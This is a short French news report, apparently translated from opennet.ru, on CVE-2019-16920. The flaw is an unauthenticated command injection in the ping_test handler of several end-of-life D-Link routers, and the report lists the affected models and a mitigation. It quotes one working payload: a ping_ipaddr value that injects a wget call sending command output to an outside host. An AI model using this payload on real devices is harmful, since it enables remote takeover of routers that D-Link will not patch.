Vulnérabilité exploitable à distance dans les routeurs D-Link

Dans les routeurs sans fil D-Link identifié vulnérabilité dangereuse (CVE-2019-16920), qui permet d'exécuter du code à distance côté appareil en envoyant une requête spéciale au gestionnaire « ping_test », accessible sans authentification.

Fait intéressant, selon les développeurs du firmware, l'appel « ping_test » ne devrait être exécuté qu'après authentification, mais en réalité, il est appelé dans tous les cas, quelle que soit la connexion à l'interface Web. En particulier, lors de l'accès au script apply_sec.cgi et du passage du paramètre « action=ping_test », le script redirige vers la page d'authentification, mais effectue en même temps l'action associée à ping_test. Pour exécuter le code, une autre vulnérabilité a été utilisée dans ping_test lui-même, qui appelle l'utilitaire ping sans vérifier correctement l'exactitude de l'adresse IP envoyée pour test. Par exemple, pour appeler l'utilitaire wget et transférer les résultats de la commande « echo 1234 » vers un hôte externe, il suffit de spécifier le paramètre « ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".

Vulnérabilité exploitable à distance dans les routeurs D-Link

La présence de la vulnérabilité a été officiellement confirmée dans les modèles suivants :

  • DIR-655 avec firmware 3.02b05 ou version antérieure ;
  • DIR-866L avec firmware 1.03b04 ou version antérieure ;
  • DIR-1565 avec firmware 1.01 ou version antérieure ;
  • DIR-652 (aucune information sur les versions problématiques du micrologiciel n'est fournie)

La période de support pour ces modèles a déjà expiré, donc D-Link dit, qui ne publiera pas de mises à jour pour éliminer la vulnérabilité, ne recommande pas de les utiliser et conseille de les remplacer par de nouveaux appareils. Pour contourner la sécurité, vous pouvez limiter l'accès à l'interface Web aux adresses IP approuvées uniquement.

Il a été découvert plus tard que la vulnérabilité était également affecte modèles DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 et DIR-825, dont les plans de publication de mises à jour ne sont pas encore connus.

Source: opennet.ru

Ajouter un commentaire